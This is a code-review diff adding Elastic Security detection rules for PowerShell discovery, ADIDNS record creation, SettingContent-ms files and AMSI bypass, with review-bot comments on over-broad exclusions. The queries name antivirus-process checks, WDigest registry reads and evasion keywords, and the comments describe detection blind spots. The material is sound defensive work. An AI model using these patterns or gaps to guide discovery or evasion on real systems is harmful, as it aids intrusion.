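Review bot: The third `filters` entry, `*ServiceNow MID Server*\agent\scripts\PowerShell\*.psm1`, is the only negated exclusion whose value begins with `*` instead of the `?:\` drive anchor the other six use, so it suppresses any script whose full path merely contains that substring, regardless of where on disk it sits. Because these filters are applied on top of the query, an over-wide one silently removes building-block coverage rather than producing visible noise; anchoring it to the product's install root, in the style of the other entries (the exact root to be confirmed for the deployed MID Server version), keeps the intended suppression. A short `note` line listing what each exclusion is meant to cover would also help the next person tuning this rule, since the filter values carry no explanation.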
diff --git a/packages/security_detection_engine/kibana/security_rule/1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_5.json b/packages/security_detection_engine/kibana/security_rule/1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_5.json new file mode 100644 index 00000000000..f07c098a154 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_5.json 
@@ -0,0 +1,193 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies the use of Cmdlets and methods related to discovery activities. Attackers can use these to perform various situational awareness related activities, like enumerating users, shares, sessions, domain trusts, groups, etc.", + "from": "now-119m", + "index": [ + "winlogbeat-*", + "logs-windows.*" + ], + "interval": "60m", + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Script with Discovery Capabilities", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n (\n \"Get-ADDefaultDomainPasswordPolicy\" or\n \"Get-ADDomain\" or \"Get-ComputerInfo\" or\n \"Get-Disk\" or \"Get-DnsClientCache\" or\n \"Get-GPOReport\" or \"Get-HotFix\" or\n \"Get-LocalUser\" or \"Get-NetFirewallProfile\" or\n \"get-nettcpconnection\" or \"Get-NetAdapter\" or\n \"Get-PhysicalDisk\" or \"Get-Process\" or\n \"Get-PSDrive\" or \"Get-Service\" or\n \"Get-SmbShare\" or \"Get-WinEvent\"\n ) or\n (\n (\"Get-WmiObject\" or \"gwmi\" or \"Get-CimInstance\" or\n \"gcim\" or \"Management.ManagementObjectSearcher\" or\n \"System.Management.ManagementClass\" or\n \"[WmiClass]\" or \"[WMI]\") and\n (\n \"AntiVirusProduct\" or \"CIM_BIOSElement\" or \"CIM_ComputerSystem\" or \"CIM_Product\" or \"CIM_DiskDrive\" or\n \"CIM_LogicalDisk\" or \"CIM_NetworkAdapter\" or \"CIM_StorageVolume\" or \"CIM_OperatingSystem\" or\n \"CIM_Process\" or \"CIM_Service\" or \"MSFT_DNSClientCache\" or \"Win32_BIOS\" or \"Win32_ComputerSystem\" or\n \"Win32_ComputerSystemProduct\" or \"Win32_DiskDrive\" or \"win32_environment\" or \"Win32_Group\" or\n \"Win32_groupuser\" or \"Win32_IP4RouteTable\" or \"Win32_logicaldisk\" or \"Win32_MappedLogicalDisk\" or\n \"Win32_NetworkAdapterConfiguration\" or \"win32_ntdomain\" or \"Win32_OperatingSystem\" or\n \"Win32_PnPEntity\" or \"Win32_Process\" or \"Win32_Product\" or 
\"Win32_quickfixengineering\" or\n \"win32_service\" or \"Win32_Share\" or \"Win32_UserAccount\"\n )\n ) or\n (\n (\"ADSI\" and \"WinNT\") or\n (\"Get-ChildItem\" and \"sysmondrv.sys\") or\n (\"::GetIPGlobalProperties()\" and \"GetActiveTcpConnections()\") or\n (\"ServiceProcess.ServiceController\" and \"::GetServices\") or\n (\"Diagnostics.Process\" and \"::GetProcesses\") or\n (\"DirectoryServices.Protocols.GroupPolicy\" and \".GetGPOReport()\") or\n (\"DirectoryServices.AccountManagement\" and \"PrincipalSearcher\") or\n (\"NetFwTypeLib.NetFwMgr\" and \"CurrentProfile\") or\n (\"NetworkInformation.NetworkInterface\" and \"GetAllNetworkInterfaces\") or\n (\"Automation.PSDriveInfo\") or\n (\"Microsoft.Win32.RegistryHive\")\n ) or\n (\n \"Get-ItemProperty\" and\n (\n \"\\Control\\SecurityProviders\\WDigest\" or\n \"\\microsoft\\windows\\currentversion\\explorer\\runmru\" or\n \"\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\Kerberos\\Parameters\" or\n \"\\Microsoft\\Windows\\CurrentVersion\\Uninstall\" or\n \"\\Microsoft\\Windows\\WindowsUpdate\" or\n \"Policies\\Microsoft\\Windows\\Installer\" or\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\" or\n (\"\\Services\\SharedAccess\\Parameters\\FirewallPolicy\" and \"EnableFirewall\") or\n (\"Microsoft\\Windows\\CurrentVersion\\Internet Settings\" and \"proxyEnable\")\n )\n ) or\n (\n (\"Directoryservices.Activedirectory\" or\n \"DirectoryServices.AccountManagement\") and \n (\n \"Domain Admins\" or \"DomainControllers\" or\n \"FindAllGlobalCatalogs\" or \"GetAllTrustRelationships\" or\n \"GetCurrentDomain\" or \"GetCurrentForest\"\n ) or\n \"DirectoryServices.DirectorySearcher\" and\n (\n \"samAccountType=805306368\" or\n \"samAccountType=805306369\" or\n \"objectCategory=group\" or\n \"objectCategory=groupPolicyContainer\" or\n \"objectCategory=site\" or\n \"objectCategory=subnet\" or\n \"objectClass=trustedDomain\"\n )\n ) or\n (\n \"Get-Process\" and\n (\n \"mcshield\" or \"windefend\" or 
\"savservice\" or\n \"TMCCSF\" or \"symantec antivirus\" or\n \"CSFalcon\" or \"TmPfw\" or \"kvoop\"\n )\n )\n ) and\n not powershell.file.script_block_text : (\n (\n \"__cmdletization_BindCommonParameters\" and\n \"Microsoft.PowerShell.Core\\Export-ModuleMember\" and\n \"Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter\"\n ) or\n \"CmdletsToExport=@(\\\"Add-Content\\\",\"\n ) and\n not user.id : (\"S-1-5-18\" or \"S-1-5-19\" or \"S-1-5-20\") and\n not file.path : (\n ?\\:\\\\\\\\Program?Files\\\\\\\\WindowsPowerShell\\\\\\\\Modules\\\\\\\\*.psd1 or\n ?\\:\\\\\\\\Program?Files\\\\\\\\WindowsPowerShell\\\\\\\\Modules\\\\\\\\*.psm1 or\n ?\\:\\\\\\\\Program?Files\\\\\\\\Microsoft?Azure?AD?Sync\\\\\\\\Extensions\\\\\\\\AADConnector.psm1* or\n *ServiceNow?MID?Server*agent\\\\\\\\scripts\\\\\\\\PowerShell\\\\\\\\*.psm1 or\n ?\\:\\\\\\\\*\\\\\\\\IMECache\\\\\\\\HealthScripts\\\\\\\\*\\\\\\\\detect.ps1\n ) and\n not (\n file.path : (\n ?\\:\\\\\\\\*\\\\\\\\TEMP\\\\\\\\SDIAG* or\n ?\\:\\\\\\\\TEMP\\\\\\\\SDIAG* or\n ?\\:\\\\\\\\Temp\\\\\\\\SDIAG* or\n ?\\:\\\\\\\\temp\\\\\\\\SDIAG* or\n ?\\:\\\\\\\\Users\\\\\\\\*\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\SDIAG* or\n ?\\:\\\\\\\\Users\\\\\\\\*\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\*\\\\\\\\SDIAG*\n ) and file.name : \"CL_Utility.ps1\"\n )\n", + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "1e0a3f7c-21e7-4bb1-98c7-2036612fb1be", + "setup": "The 'PowerShell Script Block Logging' 
logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Collection", + "Tactic: Discovery", + "Data Source: PowerShell Logs", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1087", + "name": "Account Discovery", + "reference": "https://attack.mitre.org/techniques/T1087/", + "subtechnique": [ + { + "id": "T1087.001", + "name": "Local Account", + "reference": "https://attack.mitre.org/techniques/T1087/001/" + }, + { + "id": "T1087.002", + "name": "Domain Account", + "reference": "https://attack.mitre.org/techniques/T1087/002/" + } + ] + }, + { + "id": "T1482", + "name": "Domain Trust Discovery", + "reference": "https://attack.mitre.org/techniques/T1482/" + }, + { + "id": "T1082", + "name": "System Information Discovery", + "reference": "https://attack.mitre.org/techniques/T1082/" + }, + { + "id": "T1083", + "name": "File and Directory Discovery", + "reference": "https://attack.mitre.org/techniques/T1083/" + }, + { + "id": "T1615", + "name": "Group Policy Discovery", + "reference": "https://attack.mitre.org/techniques/T1615/" + }, + { + "id": "T1135", + "name": "Network Share Discovery", + "reference": "https://attack.mitre.org/techniques/T1135/" + }, + { + "id": "T1201", + "name": "Password Policy Discovery", + "reference": "https://attack.mitre.org/techniques/T1201/" + }, + { + "id": "T1057", + 
"name": "Process Discovery", + "reference": "https://attack.mitre.org/techniques/T1057/" + }, + { + "id": "T1518", + "name": "Software Discovery", + "reference": "https://attack.mitre.org/techniques/T1518/", + "subtechnique": [ + { + "id": "T1518.001", + "name": "Security Software Discovery", + "reference": "https://attack.mitre.org/techniques/T1518/001/" + } + ] + }, + { + "id": "T1012", + "name": "Query Registry", + "reference": "https://attack.mitre.org/techniques/T1012/" + }, + { + "id": "T1082", + "name": "System Information Discovery", + "reference": "https://attack.mitre.org/techniques/T1082/" + }, + { + "id": "T1049", + "name": "System Network Connections Discovery", + "reference": "https://attack.mitre.org/techniques/T1049/" + }, + { + "id": "T1007", + "name": "System Service Discovery", + "reference": "https://attack.mitre.org/techniques/T1007/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 5 + }, + "id": "1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_6.json b/packages/security_detection_engine/kibana/security_rule/1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_6.json new file mode 100644 index 00000000000..9c356f3f5e3 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_6.json 
@@ -0,0 +1,193 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies the use of Cmdlets and methods related to discovery activities. Attackers can use these to perform various situational awareness related activities, like enumerating users, shares, sessions, domain trusts, groups, etc.", + "from": "now-119m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "interval": "60m", + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Script with Discovery Capabilities", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n (\n \"Get-ADDefaultDomainPasswordPolicy\" or\n \"Get-ADDomain\" or \"Get-ComputerInfo\" or\n \"Get-Disk\" or \"Get-DnsClientCache\" or\n \"Get-GPOReport\" or \"Get-HotFix\" or\n \"Get-LocalUser\" or \"Get-NetFirewallProfile\" or\n \"get-nettcpconnection\" or \"Get-NetAdapter\" or\n \"Get-PhysicalDisk\" or \"Get-Process\" or\n \"Get-PSDrive\" or \"Get-Service\" or\n \"Get-SmbShare\" or \"Get-WinEvent\"\n ) or\n (\n (\"Get-WmiObject\" or \"gwmi\" or \"Get-CimInstance\" or\n \"gcim\" or \"Management.ManagementObjectSearcher\" or\n \"System.Management.ManagementClass\" or\n \"[WmiClass]\" or \"[WMI]\") and\n (\n \"AntiVirusProduct\" or \"CIM_BIOSElement\" or \"CIM_ComputerSystem\" or \"CIM_Product\" or \"CIM_DiskDrive\" or\n \"CIM_LogicalDisk\" or \"CIM_NetworkAdapter\" or \"CIM_StorageVolume\" or \"CIM_OperatingSystem\" or\n \"CIM_Process\" or \"CIM_Service\" or \"MSFT_DNSClientCache\" or \"Win32_BIOS\" or \"Win32_ComputerSystem\" or\n \"Win32_ComputerSystemProduct\" or \"Win32_DiskDrive\" or \"win32_environment\" or \"Win32_Group\" or\n \"Win32_groupuser\" or \"Win32_IP4RouteTable\" or \"Win32_logicaldisk\" or \"Win32_MappedLogicalDisk\" or\n \"Win32_NetworkAdapterConfiguration\" or \"win32_ntdomain\" or \"Win32_OperatingSystem\" or\n \"Win32_PnPEntity\" or \"Win32_Process\" or 
\"Win32_Product\" or \"Win32_quickfixengineering\" or\n \"win32_service\" or \"Win32_Share\" or \"Win32_UserAccount\"\n )\n ) or\n (\n (\"ADSI\" and \"WinNT\") or\n (\"Get-ChildItem\" and \"sysmondrv.sys\") or\n (\"::GetIPGlobalProperties()\" and \"GetActiveTcpConnections()\") or\n (\"ServiceProcess.ServiceController\" and \"::GetServices\") or\n (\"Diagnostics.Process\" and \"::GetProcesses\") or\n (\"DirectoryServices.Protocols.GroupPolicy\" and \".GetGPOReport()\") or\n (\"DirectoryServices.AccountManagement\" and \"PrincipalSearcher\") or\n (\"NetFwTypeLib.NetFwMgr\" and \"CurrentProfile\") or\n (\"NetworkInformation.NetworkInterface\" and \"GetAllNetworkInterfaces\") or\n (\"Automation.PSDriveInfo\") or\n (\"Microsoft.Win32.RegistryHive\")\n ) or\n (\n \"Get-ItemProperty\" and\n (\n \"\\Control\\SecurityProviders\\WDigest\" or\n \"\\microsoft\\windows\\currentversion\\explorer\\runmru\" or\n \"\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\Kerberos\\Parameters\" or\n \"\\Microsoft\\Windows\\CurrentVersion\\Uninstall\" or\n \"\\Microsoft\\Windows\\WindowsUpdate\" or\n \"Policies\\Microsoft\\Windows\\Installer\" or\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\" or\n (\"\\Services\\SharedAccess\\Parameters\\FirewallPolicy\" and \"EnableFirewall\") or\n (\"Microsoft\\Windows\\CurrentVersion\\Internet Settings\" and \"proxyEnable\")\n )\n ) or\n (\n (\"Directoryservices.Activedirectory\" or\n \"DirectoryServices.AccountManagement\") and \n (\n \"Domain Admins\" or \"DomainControllers\" or\n \"FindAllGlobalCatalogs\" or \"GetAllTrustRelationships\" or\n \"GetCurrentDomain\" or \"GetCurrentForest\"\n ) or\n \"DirectoryServices.DirectorySearcher\" and\n (\n \"samAccountType=805306368\" or\n \"samAccountType=805306369\" or\n \"objectCategory=group\" or\n \"objectCategory=groupPolicyContainer\" or\n \"objectCategory=site\" or\n \"objectCategory=subnet\" or\n \"objectClass=trustedDomain\"\n )\n ) or\n (\n \"Get-Process\" and\n (\n \"mcshield\" or 
\"windefend\" or \"savservice\" or\n \"TMCCSF\" or \"symantec antivirus\" or\n \"CSFalcon\" or \"TmPfw\" or \"kvoop\"\n )\n )\n ) and\n not powershell.file.script_block_text : (\n (\n \"__cmdletization_BindCommonParameters\" and\n \"Microsoft.PowerShell.Core\\Export-ModuleMember\" and\n \"Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter\"\n ) or\n \"CmdletsToExport=@(\\\"Add-Content\\\",\"\n ) and\n not user.id : (\"S-1-5-18\" or \"S-1-5-19\" or \"S-1-5-20\") and\n not file.path : (\n ?\\:\\\\\\\\Program?Files\\\\\\\\WindowsPowerShell\\\\\\\\Modules\\\\\\\\*.psd1 or\n ?\\:\\\\\\\\Program?Files\\\\\\\\WindowsPowerShell\\\\\\\\Modules\\\\\\\\*.psm1 or\n ?\\:\\\\\\\\Program?Files\\\\\\\\Microsoft?Azure?AD?Sync\\\\\\\\Extensions\\\\\\\\AADConnector.psm1* or\n *ServiceNow?MID?Server*agent\\\\\\\\scripts\\\\\\\\PowerShell\\\\\\\\*.psm1 or\n ?\\:\\\\\\\\*\\\\\\\\IMECache\\\\\\\\HealthScripts\\\\\\\\*\\\\\\\\detect.ps1\n ) and\n not (\n file.path : (\n ?\\:\\\\\\\\*\\\\\\\\TEMP\\\\\\\\SDIAG* or\n ?\\:\\\\\\\\TEMP\\\\\\\\SDIAG* or\n ?\\:\\\\\\\\Temp\\\\\\\\SDIAG* or\n ?\\:\\\\\\\\temp\\\\\\\\SDIAG* or\n ?\\:\\\\\\\\Users\\\\\\\\*\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\SDIAG* or\n ?\\:\\\\\\\\Users\\\\\\\\*\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\*\\\\\\\\SDIAG*\n ) and file.name : \"CL_Utility.ps1\"\n )\n", + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "1e0a3f7c-21e7-4bb1-98c7-2036612fb1be", + "setup": "## Setup\n\nThe 
'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Collection", + "Tactic: Discovery", + "Data Source: PowerShell Logs", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1087", + "name": "Account Discovery", + "reference": "https://attack.mitre.org/techniques/T1087/", + "subtechnique": [ + { + "id": "T1087.001", + "name": "Local Account", + "reference": "https://attack.mitre.org/techniques/T1087/001/" + }, + { + "id": "T1087.002", + "name": "Domain Account", + "reference": "https://attack.mitre.org/techniques/T1087/002/" + } + ] + }, + { + "id": "T1482", + "name": "Domain Trust Discovery", + "reference": "https://attack.mitre.org/techniques/T1482/" + }, + { + "id": "T1082", + "name": "System Information Discovery", + "reference": "https://attack.mitre.org/techniques/T1082/" + }, + { + "id": "T1083", + "name": "File and Directory Discovery", + "reference": "https://attack.mitre.org/techniques/T1083/" + }, + { + "id": "T1615", + "name": "Group Policy Discovery", + "reference": "https://attack.mitre.org/techniques/T1615/" + }, + { + "id": "T1135", + "name": "Network Share Discovery", + "reference": "https://attack.mitre.org/techniques/T1135/" + }, + { + "id": "T1201", + "name": "Password Policy Discovery", + "reference": 
"https://attack.mitre.org/techniques/T1201/" + }, + { + "id": "T1057", + "name": "Process Discovery", + "reference": "https://attack.mitre.org/techniques/T1057/" + }, + { + "id": "T1518", + "name": "Software Discovery", + "reference": "https://attack.mitre.org/techniques/T1518/", + "subtechnique": [ + { + "id": "T1518.001", + "name": "Security Software Discovery", + "reference": "https://attack.mitre.org/techniques/T1518/001/" + } + ] + }, + { + "id": "T1012", + "name": "Query Registry", + "reference": "https://attack.mitre.org/techniques/T1012/" + }, + { + "id": "T1082", + "name": "System Information Discovery", + "reference": "https://attack.mitre.org/techniques/T1082/" + }, + { + "id": "T1049", + "name": "System Network Connections Discovery", + "reference": "https://attack.mitre.org/techniques/T1049/" + }, + { + "id": "T1007", + "name": "System Service Discovery", + "reference": "https://attack.mitre.org/techniques/T1007/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 6 + }, + "id": "1e0a3f7c-21e7-4bb1-98c7-2036612fb1be_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1e1b2e7e-b8f5-45e5-addc-66cc1224ffbc_1.json b/packages/security_detection_engine/kibana/security_rule/1e1b2e7e-b8f5-45e5-addc-66cc1224ffbc_1.json new file mode 100644 index 00000000000..ef18df409a6 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1e1b2e7e-b8f5-45e5-addc-66cc1224ffbc_1.json 
@@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Active Directory Integrated DNS (ADIDNS) is one of the core components of AD DS, leveraging AD's access control and replication to maintain domain consistency. It stores DNS zones as AD objects, a feature that, while robust, introduces some security issues because of the default permission (Any authenticated users) to create DNS-named records. Attackers can perform Dynamic Spoofing attacks, where they monitor LLMNR/NBT-NS requests and create DNS-named records to target systems that are requested from multiple systems. They can also create specific records to target specific services, such as wpad, for spoofing attacks.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Creation of a DNS-Named Record", + "query": "any where host.os.type == \"windows\" and event.action == \"Directory Service Changes\" and\n event.code == \"5137\" and winlog.event_data.ObjectClass == \"dnsNode\" and\n not winlog.event_data.SubjectUserName : \"*$\"\n", + "references": [ + "https://www.netspi.com/blog/technical/network-penetration-testing/adidns-revisited/", + "https://www.thehacker.recipes/a-d/movement/mitm-and-coerced-authentications/wpad-spoofing" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.ObjectClass", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectUserName", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "1e1b2e7e-b8f5-45e5-addc-66cc1224ffbc", + "setup": "## 
Setup\n\nThe 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover the target object by default (we still need it to be configured to generate events), so we need to set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=MicrosoftDNS,DC=DomainDNSZones,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights CreateChild -InheritanceFlags Descendents -AttributeGUID e0fa1e8c-9b45-11d0-afdd-00c04fd930c9 -AuditFlags Success\n```\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Active Directory", + "Use Case: Active Directory Monitoring" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1557", + "name": "Adversary-in-the-Middle", + "reference": "https://attack.mitre.org/techniques/T1557/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "1e1b2e7e-b8f5-45e5-addc-66cc1224ffbc_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1e6363a6-3af5-41d4-b7ea-d475389c0ceb_2.json b/packages/security_detection_engine/kibana/security_rule/1e6363a6-3af5-41d4-b7ea-d475389c0ceb_2.json new file mode 100644 index 00000000000..9d07e7a551c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1e6363a6-3af5-41d4-b7ea-d475389c0ceb_2.json 
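Review bot: The `not winlog.event_data.SubjectUserName : "*$"` clause excludes every machine account, so a dnsNode created through a computer account — including one an authenticated user adds under the default MachineAccountQuota, which is how the ADIDNS tooling in the references is commonly driven — never alerts. The exclusion presumably exists because dynamic registrations are written under the domain controllers' own accounts; if so, excluding only a known set of DC/DNS-server `SubjectUserName` values (or the `*$` accounts that are members of Domain Controllers) keeps the noise suppression without blinding the rule to attacker-created computer accounts. The `setup` text also audits only `CN=MicrosoftDNS,DC=DomainDNSZones,...`; zones replicated in ForestDnsZones or stored under `CN=MicrosoftDNS,CN=System` in the domain partition would produce no 5137 events for this rule, so a sentence pointing operators at those containers would avoid a silent coverage gap.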
@@ -0,0 +1,111 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies the suspicious creation of SettingContents-ms files, which have been used in attacks to achieve code execution while evading defenses.", + "from": "now-119m", + "index": [ + "logs-endpoint.events.*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "Creation of SettingContent-ms Files", + "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n file.extension : \"settingcontent-ms\" and\n not file.path : \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Packages\\\\windows.immersivecontrolpanel_*\\\\LocalState\\\\Indexed\\\\Settings\\\\*\"\n", + "references": [ + "https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "1e6363a6-3af5-41d4-b7ea-d475389c0ceb", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1204", + "name": "User Execution", + "reference": "https://attack.mitre.org/techniques/T1204/", + "subtechnique": [ + { + "id": "T1204.002", + "name": "Malicious File", + "reference": "https://attack.mitre.org/techniques/T1204/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": 
{ + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.001", + "name": "Spearphishing Attachment", + "reference": "https://attack.mitre.org/techniques/T1566/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "1e6363a6-3af5-41d4-b7ea-d475389c0ceb_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1f0a69c0-3392-4adf-b7d5-6012fd292da8_8.json b/packages/security_detection_engine/kibana/security_rule/1f0a69c0-3392-4adf-b7d5-6012fd292da8_8.json new file mode 100644 index 00000000000..fab92b4647a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1f0a69c0-3392-4adf-b7d5-6012fd292da8_8.json 
@@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of PowerShell script with keywords related to different Antimalware Scan Interface (AMSI) bypasses. An adversary may attempt first to disable AMSI before executing further malicious powershell scripts to evade detection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential Antimalware Scan Interface Bypass via PowerShell", + "note": "## Triage and analysis\n\n### Investigating Potential Antimalware Scan Interface Bypass via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. AMSI integrates with multiple Windows components, ranging from User Account Control (UAC) to VBA macros and PowerShell.\n\nThis rule identifies scripts that contain methods and classes that can be abused to bypass AMSI.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) 